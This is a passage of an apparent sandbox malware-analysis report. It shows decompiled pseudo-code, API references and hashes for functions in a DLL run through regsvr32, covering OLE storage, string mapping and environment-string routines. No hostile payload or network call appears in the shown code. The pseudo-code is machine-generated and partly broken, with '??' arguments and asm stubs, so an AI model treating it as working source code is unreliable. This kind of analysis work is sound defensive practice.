				 *((intOrPtr*)(_t227 - 0x10)) = 0;
				 *((intOrPtr*)(_t227 - 0x14)) = 0;
				 *((intOrPtr*)(_t227 + 8)) = 0;
				E1001180B(__ecx, __ecx + 0x3c);
				_t119 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0xbc))();
				 *((intOrPtr*)(_t227 - 0x20)) = _t119;
				if(_t119 != 0) {
					L4:
					_t225 =  *(_t227 + 0xc);
					if(_t225 == 0) {
						if( *(_t227 + 0x10) != 0) {
							L15:
							_t120 =  *_t220;
							_push(_t227 - 0x14);
							_push(0x10082230);
							_push(_t120);
							if( *((intOrPtr*)( *_t120))() < 0) {
								L39:
								if( *((intOrPtr*)(_t227 + 0x14)) >= 0) {
									L42:
									_t122 =  *((intOrPtr*)(_t227 + 8));
									if(_t122 != 0) {
										 *((intOrPtr*)( *_t122 + 8))(_t122);
									}
									if( *((intOrPtr*)(_t227 - 0x20)) != 0 &&  *((intOrPtr*)(_t227 + 0x14)) >= 0) {
										 *((intOrPtr*)(_t227 + 0x14)) = 1;
									}
									_t115 =  *((intOrPtr*)(_t227 + 0x14));
									goto L48;
								}
								L40:
								_t124 =  *_t220;
								if(_t124 != 0) {
									 *((intOrPtr*)( *_t124 + 0x18))(_t124, 1);
									_t126 =  *_t220;
									 *((intOrPtr*)( *_t126 + 8))(_t126);
									 *_t220 = 0;
								}
								goto L42;
							}
							if(_t225 != 0) {
								if( *(_t227 + 0x10) == 0) {
									 *((intOrPtr*)(_t227 + 0x14)) = 0x8000ffff;
									L33:
									_t128 =  *((intOrPtr*)(_t227 - 0x14));
									L34:
									 *((intOrPtr*)( *_t128 + 8))(_t128);
									L35:
									if( *((intOrPtr*)(_t227 + 0x14)) < 0) {
										goto L40;
									}
									if( *((intOrPtr*)(_t227 - 0x20)) == 0) {
										_t187 =  *((intOrPtr*)(_t227 - 0x24));
										if(( *(_t187 + 0x72) & 0x00000002) == 0) {
											_t130 =  *_t220;
											 *((intOrPtr*)(_t227 + 0x14)) =  *((intOrPtr*)( *_t130 + 0xc))(_t130, _t187 + 0xb8);
										}
									}
									goto L39;
								}
								_t133 =  *((intOrPtr*)( *_t225 + 0x30))();
								 *(_t227 + 0xc) = _t133;
								_t134 = GlobalAlloc(0, _t133);
								 *(_t227 + 0x10) = _t134;
								if(_t134 == 0) {
									L26:
									 *((intOrPtr*)(_t227 + 0x14)) = 0x8007000e;
									 *(_t227 + 0x10) = 0;
									L27:
									 *(_t227 - 0x1c) = 0;
									if( *(_t227 + 0x10) == 0) {
										goto L33;
									}
									_t135 = _t227 - 0x1c;
									__imp__CreateILockBytesOnHGlobal( *(_t227 + 0x10), 1, _t135);
									 *((intOrPtr*)(_t227 + 0x14)) = _t135;
									if(_t135 < 0) {
										goto L33;
									}
									_t136 = _t227 - 0x18;
									 *((intOrPtr*)(_t227 - 0x18)) = 0;
									__imp__StgOpenStorageOnILockBytes( *(_t227 - 0x1c), 0, 0x12, 0, 0, _t136);
									 *((intOrPtr*)(_t227 + 0x14)) = _t136;
									if(_t136 >= 0) {
										_t139 =  *((intOrPtr*)(_t227 - 0x14));
										 *((intOrPtr*)(_t227 + 0x14)) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *((intOrPtr*)(_t227 - 0x18)));
										_t141 =  *((intOrPtr*)(_t227 - 0x18));
										 *((intOrPtr*)( *_t141 + 8))(_t141);
									}
									_t137 =  *(_t227 - 0x1c);
									L21:
									 *((intOrPtr*)( *_t137 + 8))(_t137);
									goto L33;
								}
								_t143 = GlobalLock(_t134);
								if(_t143 == 0) {
									goto L26;
								}
								 *((intOrPtr*)( *_t225 + 0x34))(_t143,  *(_t227 + 0xc));
								GlobalUnlock( *(_t227 + 0x10));
								goto L27;
							}
							_t146 = _t227 + 0xc;
							 *(_t227 + 0xc) = 0;
							__imp__CreateILockBytesOnHGlobal(0, 1, _t146);
							 *((intOrPtr*)(_t227 + 0x14)) = _t146;
							if(_t146 < 0) {
								goto L33;
							}
							_t147 = _t227 + 0x10;
							 *(_t227 + 0x10) = 0;
							__imp__StgCreateDocfileOnILockBytes( *(_t227 + 0xc), 0x1012, 0, _t147);
							 *((intOrPtr*)(_t227 + 0x14)) = _t147;
							if(_t147 >= 0) {
								_t148 =  *((intOrPtr*)(_t227 - 0x14));
								 *((intOrPtr*)(_t227 + 0x14)) =  *((intOrPtr*)( *_t148 + 0x14))(_t148,  *(_t227 + 0x10));
								_t150 =  *(_t227 + 0x10);
								 *((intOrPtr*)( *_t150 + 8))(_t150);
							}
							_t137 =  *(_t227 + 0xc);
							goto L21;
						}
						L10:
						_t152 =  *_t220;
						_push(_t227 - 0x10);
						_push(0x10082240);
						_push(_t152);
						if( *((intOrPtr*)( *_t152))() < 0) {
							goto L15;
						} else {
							if(_t225 != 0) {
								L1005059E(_t227 - 0x70);
								 *(_t227 - 4) = 0;
								E1003B524(_t227 - 0x2c, _t227 - 0x70);
								_t157 =  *((intOrPtr*)(_t227 - 0x10));
								_t158 =  *((intOrPtr*)( *_t157 + 0x14))(_t157, _t227 - 0x2c, _t225, 1, 0x1000, 0);
								 *(_t227 - 4) =  *(_t227 - 4) | 0xffffffff;
								 *((intOrPtr*)(_t227 + 0x14)) = _t158;
								L1005067A(_t227 - 0x70);
							} else {
								_t160 =  *((intOrPtr*)(_t227 - 0x10));
								 *((intOrPtr*)(_t227 + 0x14)) =  *((intOrPtr*)( *_t160 + 0x20))(_t160);
							}
							_t128 =  *((intOrPtr*)(_t227 - 0x10));
							goto L34;
						}
					}
					if( *(_t227 + 0x10) != 0) {
						goto L15;
					}
					_t162 =  *_t220;
					_push(_t227 + 8);
					_push(0x10082250);
					_push(_t162);
					if( *((intOrPtr*)( *_t162))() < 0) {
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(3);
					if( *((intOrPtr*)( *_t225 + 0x50))() == 0) {
						goto L10;
					} else {
						 *(_t227 + 0x10) = 0;
						_t167 =  *((intOrPtr*)( *_t225 + 0x50))(0, 0xffffffff, _t227 + 0x10, _t227 + 0xc);
						_t207 =  *((intOrPtr*)(_t227 + 8));
						 *((intOrPtr*)(_t227 + 0x14)) =  *((intOrPtr*)( *_t207 + 0x14))(_t207,  *(_t227 + 0x10), _t167);
						_t169 =  *((intOrPtr*)(_t227 + 8));
						 *((intOrPtr*)( *_t169 + 8))(_t169);
						 *((intOrPtr*)(_t227 + 8)) = 0;
						goto L35;
					}
				}
				_t171 =  *_t220;
				 *((intOrPtr*)( *_t171 + 0x58))(_t171, 1, __ecx + 0x70);
				if(( *(__ecx + 0x72) & 0x00000002) == 0) {
					goto L4;
				}
				_t173 =  *_t220;
				_t174 =  *((intOrPtr*)( *_t173 + 0xc))(_t173, __ecx + 0xb8);
				 *((intOrPtr*)(_t227 + 0x14)) = _t174;
				if(_t174 < 0) {
					goto L40;
				}
				goto L4;
			}

0x10011397
0x100113a9
0x100113ac
0x100113bb
0x100113c2
0x100113c5
0x1001168b
0x10011691
0x10011699
0x10011699
0x100113d1
0x100113d4
0x100113d7
0x100113da
0x100113e3
0x100113eb
0x100113ee
0x1001141e
0x1001141e
0x10011423
0x1001148b
0x100114f7
0x100114f7
0x100114fc
0x100114fd
0x10011504
0x10011509
0x1001164d
0x10011650
0x1001166a
0x1001166a
0x1001166f
0x10011674
0x10011674
0x1001167a
0x10011681
0x10011681
0x10011688
0x00000000
0x10011688
0x10011652
0x10011652
0x10011656
0x1001165d
0x10011660
0x10011665
0x10011668
0x10011668
0x00000000
0x10011656
0x10011511
0x10011574
0x10011618
0x1001161f
0x1001161f
0x10011622
0x10011625
0x10011628
0x1001162b
0x00000000
0x00000000
0x10011630
0x10011632
0x10011639
0x1001163b
0x1001164a
0x1001164a
0x10011639
0x00000000
0x10011630
0x1001157e
0x10011583
0x10011586
0x1001158e
0x10011591
0x100115b4
0x100115b4
0x100115bb
0x100115be
0x100115c1
0x100115c4
0x00000000
0x00000000
0x100115c6
0x100115cf
0x100115d7
0x100115da
0x00000000
0x00000000
0x100115dc
0x100115df
0x100115eb
0x100115f3
0x100115f6
0x100115f8
0x10011604
0x10011607
0x1001160d
0x1001160d
0x10011610
0x10011566
0x10011569
0x00000000
0x10011569
0x10011594
0x1001159c
0x00000000
0x00000000
0x100115a6
0x100115ac
0x00000000
0x100115ac
0x10011513
0x10011516
0x1001151d
0x10011525
0x10011528
0x00000000
0x00000000
0x1001152e
0x10011531
0x1001153e
0x10011546
0x10011549
0x1001154b
0x10011557
0x1001155a
0x10011560
0x10011560
0x10011563
0x00000000
0x10011563
0x1001148d
0x1001148d
0x10011492
0x10011493
0x1001149a
0x1001149f
0x00000000
0x100114a1
0x100114a3
0x100114bf
0x100114cb
0x100114ce
0x100114d3
0x100114dd
0x100114e0
0x100114e7
0x100114ea
0x100114a5
0x100114a5
0x100114ae
0x100114ae
0x100114ef
0x00000000
0x100114ef
0x1001149f
0x10011428
0x00000000
0x00000000
0x1001142e
0x10011433
0x10011434
0x1001143b
0x10011440
0x00000000
0x00000000
0x10011444
0x10011445
0x10011446
0x10011447
0x10011450
0x00000000
0x10011452
0x10011461
0x10011464
0x10011467
0x10011474
0x10011477
0x1001147d
0x10011480
0x00000000
0x10011480
0x10011450
0x100113f0
0x100113fb
0x10011402
0x00000000
0x00000000
0x10011404
0x10011410
0x10011415
0x10011418
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 10011397

Part of subcall function 10011164: CoGetClassObject.OLE32(00000000,?,00000000,10082200,00000003), ref: 10011184

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 1001151D
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 1001153E
GlobalAlloc.KERNEL32(00000000,00000000,?,00000000), ref: 10011586
GlobalLock.KERNEL32 ref: 10011594
GlobalUnlock.KERNEL32(?,?,00000000), ref: 100115AC
CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 100115CF
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 100115EB

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prologObjectOpenStorageUnlock
String ID:
API String ID: 1375250198-0
Opcode ID: 3008e166d8bd0cf7d3fad8b921494e1b8473c47a30a2c40ead7cadbbcea9893d
Instruction ID: 792fe364721ea3678fdfb635eb6193d3f10aa9b451ee4219a068daff277795c7
Opcode Fuzzy Hash: 3008e166d8bd0cf7d3fad8b921494e1b8473c47a30a2c40ead7cadbbcea9893d
Instruction Fuzzy Hash: DDB106B0A0024AEFDB18CF94C8889AEBBB9FF48344B10456DF915DB251D731DD91CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001F0D2 Relevance: 12.2, APIs: 8, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E1001F0D2(int _a4, int _a8, signed char _a9, short* _a12, int _a16, short* _a20, int _a24, int _a28) {
				signed int _v8;
				intOrPtr _v20;
				char* _v28;
				char* _v32;
				int _v36;
				char* _v40;
				int _v48;
				void* _v60;
				int _t55;
				int _t56;
				int _t57;
				int _t69;
				int _t72;
				char* _t77;
				int _t78;
				void* _t79;
				int _t84;
				intOrPtr _t89;
				char* _t90;
				int _t93;

				_push(0xffffffff);
				_push(0x10080708);
				_push(E10022B50);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t89;
				_t90 = _t89 - 0x1c;
				_v28 = _t90;
				_t93 =  *0x10094fd4; // 0x0
				if(_t93 != 0) {
					L5:
					if(_a16 > 0) {
						_t72 = E1001F2DB(_a12, _a16);
						_pop(_t79);
						_a16 = _t72;
					}
					_t55 =  *0x10094fd4; // 0x0
					if(_t55 != 1) {
						if(_t55 != 2) {
							goto L30;
						} else {
							if(_a28 == 0) {
								_a28 =  *0x1009505c;
							}
							_t57 = WideCharToMultiByte(_a28, 0x220, _a12, _a16, 0, 0, 0, 0);
							_v36 = _t57;
							if(_t57 == 0) {
								goto L30;
							} else {
								_v8 = 0;
								E1001B2B0(_t57 + 0x00000003 & 0x000000fc, _t79);
								_v28 = _t90;
								_v32 = _t90;
								_v8 = _v8 | 0xffffffff;
								if(_v32 == 0 || WideCharToMultiByte(_a28, 0x220, _a12, _a16, _v32, _v36, 0, 0) == 0) {
									goto L30;
								} else {
									_t84 = LCMapStringA(_a4, _a8, _v32, _v36, 0, 0);
									_v48 = _t84;
									if(_t84 == 0) {
										goto L30;
									} else {
										_v8 = 1;
										E1001B2B0(_t63 + 0x00000003 & 0x000000fc, _t79);
										_v28 = _t90;
										_t77 = _t90;
										_v40 = _t77;
										_v8 = _v8 | 0xffffffff;
										if(_t77 == 0 || LCMapStringA(_a4, _a8, _v32, _v36, _t77, _t84) == 0) {
											goto L30;
										} else {
											if((_a9 & 0x00000004) == 0) {
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t84 = MultiByteToWideChar(_a28, 1, _t77, _t84, ??, ??);
												if(_t84 == 0) {
													goto L30;
												} else {
													goto L29;
												}
											} else {
												_t69 = _a24;
												if(_t69 != 0) {
													if(_t69 >= _t84) {
														_t69 = _t84;
													}
													E10025410(_a20, _t77, _t69);
												}
												L29:
												_t56 = _t84;
											}
										}
									}
								}
							}
						}
					} else {
						_t56 = LCMapStringW(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t78 = 1;
					if(LCMapStringW(0, 0x100, 0x10080700, _t78, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x100806fc, _t78, 0, 0) == 0) {
							L30:
							_t56 = 0;
						} else {
							 *0x10094fd4 = 2;
							goto L5;
						}
					} else {
						 *0x10094fd4 = _t78;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t56;
			}

0x1001f0d5
0x1001f0d7
0x1001f0dc
0x1001f0e7
0x1001f0e8
0x1001f0ef
0x1001f0f5
0x1001f0fa
0x1001f100
0x1001f148
0x1001f14b
0x1001f153
0x1001f159
0x1001f15a
0x1001f15a
0x1001f15d
0x1001f165
0x1001f187
0x00000000
0x1001f18d
0x1001f190
0x1001f197
0x1001f197
0x1001f1ac
0x1001f1b2
0x1001f1b7
0x00000000
0x1001f1bd
0x1001f1bd
0x1001f1c5
0x1001f1ca
0x1001f1cf
0x1001f1e0
0x1001f1e7
0x00000000
0x1001f211
0x1001f225
0x1001f227
0x1001f22c
0x00000000
0x1001f232
0x1001f232
0x1001f23e
0x1001f243
0x1001f246
0x1001f248
0x1001f24b
0x1001f265
0x00000000
0x1001f27f
0x1001f283
0x1001f2a4
0x1001f2aa
0x1001f2ad
0x1001f2a6
0x1001f2a6
0x1001f2a7
0x1001f2a7
0x1001f2bd
0x1001f2c1
0x00000000
0x00000000
0x00000000
0x00000000
0x1001f285
0x1001f285
0x1001f28a
0x1001f28e
0x1001f290
0x1001f290
0x1001f297
0x1001f29c
0x1001f2c3
0x1001f2c3
0x1001f2c3
0x1001f283
0x1001f265
0x1001f22c
0x1001f1e7
0x1001f1b7
0x1001f167
0x1001f179
0x1001f179
0x1001f102
0x1001f102
0x1001f103
0x1001f106
0x1001f11c
0x1001f138
0x1001f2c7
0x1001f2c7
0x1001f13e
0x1001f13e
0x00000000
0x1001f13e
0x1001f11e
0x1001f11e
0x00000000
0x1001f11e
0x1001f11c
0x1001f2cf
0x1001f2da

APIs

LCMapStringW.KERNEL32(00000000,00000100,10080700,00000001,00000000,00000000,?,00000100,100967C4), ref: 1001F114
LCMapStringA.KERNEL32(00000000,00000100,100806FC,00000001,00000000,00000000,?,00000100,100967C4), ref: 1001F130
LCMapStringW.KERNEL32(?,?,?,?,?,?,?,00000100,100967C4), ref: 1001F179
WideCharToMultiByte.KERNEL32(100967C4,00000220,?,?,00000000,00000000,00000000,00000000,?,00000100,100967C4), ref: 1001F1AC
WideCharToMultiByte.KERNEL32(100967C4,00000220,?,?,?,100967C4,00000000,00000000,?,00000100,100967C4), ref: 1001F203
LCMapStringA.KERNEL32(?,?,?,100967C4,00000000,00000000,?,00000100,100967C4), ref: 1001F21F
LCMapStringA.KERNEL32(?,?,?,100967C4,?,00000000,?,00000100,100967C4), ref: 1001F275

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 8dbf714387e71f18a4e255d30b3a611294a9e0b19125aba27c280dd71d7a4462
Instruction ID: 56a5e55d49a3a65d3aec2a43592833278e84c2ba037f6aef467c5fa268c3ce14
Opcode Fuzzy Hash: 8dbf714387e71f18a4e255d30b3a611294a9e0b19125aba27c280dd71d7a4462
Instruction Fuzzy Hash: A451493590022AFBDF228F90CC45EEE7FB5FB597A0F10441AF918A51A0C731C9A1DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10021A30 Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10021A30() {
				int _v4;
				int _v8;
				void* __ebx;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x1009517c;
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E1001A76A(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E1001ACB0(_t32, _t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E1001A76A(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E1001A722(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x1009517c = 2;
					goto L18;
				}
				 *0x1009517c = 1;
				goto L6;
			}

0x10021a32
0x10021a41
0x10021a43
0x10021a45
0x10021a49
0x10021a81
0x10021b0b
0x10021b59
0x00000000
0x10021b59
0x10021b0d
0x10021b0f
0x10021b1d
0x10021b1f
0x10021b21
0x10021b2d
0x10021b30
0x10021b38
0x10021b3d
0x10021b46
0x10021b3f
0x10021b3f
0x10021b3f
0x10021b4f
0x00000000
0x00000000
0x00000000
0x00000000
0x10021b23
0x10021b23
0x10021b23
0x10021b23
0x10021b24
0x10021b28
0x10021b29
0x00000000
0x10021b23
0x10021b17
0x10021b1b
0x00000000
0x00000000
0x00000000
0x10021b1b
0x10021a87
0x10021a89
0x10021a97
0x10021a9a
0x10021a9c
0x10021aac
0x10021ab8
0x10021abf
0x10021ac5
0x10021ac9
0x10021acc
0x10021ad4
0x10021ad8
0x10021ae9
0x10021aef
0x10021af5
0x10021af5
0x10021af9
0x10021af9
0x10021ad8
0x10021afe
0x00000000
0x00000000
0x00000000
0x00000000
0x10021a9e
0x10021a9e
0x10021a9e
0x10021a9f
0x10021aa0
0x10021aa6
0x10021aa7
0x00000000
0x10021a9e
0x10021a8d
0x10021a91
0x00000000
0x00000000
0x00000000
0x10021a91
0x10021a4d
0x10021a51
0x10021a65
0x10021a69
0x00000000
0x00000000
0x10021a6f
0x00000000
0x10021a6f
0x10021a53
0x00000000

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,1001A8AB), ref: 10021A4B
GetEnvironmentStrings.KERNEL32(?,?,?,?,1001A8AB), ref: 10021A5F
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,1001A8AB), ref: 10021A8B
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,1001A8AB), ref: 10021AC3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,1001A8AB), ref: 10021AE5
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,1001A8AB), ref: 10021AFE
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,1001A8AB), ref: 10021B11
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 10021B4F

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: e46ad73e866b78bea07ad4dde2ab2f724b769a41d4d93185616393f72d477487
Instruction ID: 0d58f5e11018274b54d083661c797389b9ff5455a705d844fce3c27cf3bdcc13
Opcode Fuzzy Hash: e46ad73e866b78bea07ad4dde2ab2f724b769a41d4d93185616393f72d477487
Instruction Fuzzy Hash: 6131587A50436A6FE711FFB96CC48AF76EDF65A294B92053AF845C3100F7228C8087A1

Uniqueness

Uniqueness Score: -1.00%

Function 10043BC9 Relevance: 12.1, APIs: 8, Instructions: 120
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E10043BC9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct tagRECT* _a20, intOrPtr _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebp;
				int _t56;
				intOrPtr* _t57;
				signed short _t62;
				void* _t63;
				void* _t67;
				intOrPtr* _t80;
				signed int _t83;
				struct HWND__* _t86;
				void* _t87;

				_t67 = __ecx;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x1c),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(_a16 == 1) {
					_v40 = _v40 & 0x00000000;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t56 = GetTopWindow( *(_t67 + 0x1c));
				_t86 = _t56;
				while(_t86 != 0) {
					_t62 = GetDlgCtrlID(_t86);
					_push(_t86);
					_t83 = _t62 & 0x0000ffff;
					_t63 = E10041F9F();
					if(_t83 != _a12) {
